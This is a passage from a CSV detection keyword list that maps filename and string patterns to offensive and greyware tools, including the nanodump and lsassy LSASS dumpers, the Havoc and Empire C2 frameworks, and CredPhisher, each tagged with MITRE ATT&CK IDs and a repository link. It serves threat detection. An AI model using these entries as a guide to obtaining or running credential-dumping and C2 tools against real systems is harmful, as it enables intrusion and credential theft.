security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*NamedPipeImpersonation.cs*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*NamedPipeImpersonation.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*NamedPipeServer.ps1*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" +"*namespace CredPhisher*","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 
","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*namespace RedPersist.Persist*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*namespace WheresMyImplant*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*namfblliamklmeodpcelkokjbffgmeoo*","greyware_tool_keyword","Daily VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*namp *--script *","offensive_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Network Exploitation tools","https://nmap.org/book/nse-usage.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*nanodump *","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump -*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump.*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*nanodump.*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump.git*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump.x64*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump.x64.exe*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump.x86*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*nanodump_pipe*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*nanodump_ppl.x64.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*nanodump_ppl_dump*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump_ppl_dump.x64*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump_ppl_dump.x86*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump_ppl_medic*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump_ppl_medic.x64*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump_ppl_medic.x86*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump_ssp*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*nanodump_ssp*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump_ssp.x64*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump_ssp.x64.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*nanodump_ssp.x64.dll*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump_ssp.x86*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump_ssp_embedded.*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*NanoDumpChoose*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*nanodump-pipes*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*NanoDumpWriteDump*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanorobeus*_cs.x64.*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*nanorobeus*_cs.x86.*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*nanorobeus*dump*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*nanorobeus.cna*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*nanorobeus.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*nanorobeus.x64*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - 
TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*nanorobeus.x64.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*nanorobeus.x86*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*nanorobeus_brc4*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*nanorobeus64*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*nanorobeus86*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*nanorobeus-main*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - 
TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*nanorubeus.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*Narasimha1997/fake-sms*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","8","10","2514","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" +"*NativeEasyHook32.dll*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*NativeEasyHook64.dll*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*Naughty-Script.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid 
penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*nbcojefnccbanplpoffopkoepjmhgdgh*","greyware_tool_keyword","Hoxx VPN Proxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*NBNSBruteForceHost*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*NBNSBruteForcePause*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*NBNSBruteForceSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*NBNSBruteForceTarget*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*nbnsspoof.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*NBNSSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - 
Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*nbtscan -r */24*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*nbtscan -r */24*","greyware_tool_keyword","nbtscan","smb enumeration","T1135 - T1046","TA0007 - TA0009","N/A","N/A","discovery","https://github.com/charlesroelli/nbtscan","1","0","N/A","5","2","124","23","2016-05-26T20:16:52Z","2016-05-26T20:16:33Z" +"*nbtstat -n*","greyware_tool_keyword","nbtstat","Displays the NetBIOS name table of the local computer. 
